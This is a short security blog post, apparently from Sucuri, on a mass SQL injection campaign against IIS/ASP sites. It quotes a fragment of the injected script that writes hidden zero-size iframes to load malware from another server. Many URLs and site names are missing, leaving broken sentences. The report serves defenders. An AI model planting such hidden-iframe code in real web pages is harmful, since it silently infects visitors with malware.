Mass infection of IIS/ASP sites –

A large number of sites have been hacked again in the last few hours with a malware script pointing to . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,””);document.write(“< iframe src= width=0 height==>
<iframe src= width=22 height=1

So it loads malware from, which then calls to load the virus. This is the output of our scan agaisnt

What is funny is that one of the top pages that got hacked was and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “””” to see it.

If your site is hacked (or contains malware), and you need help, send us an email at or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Share This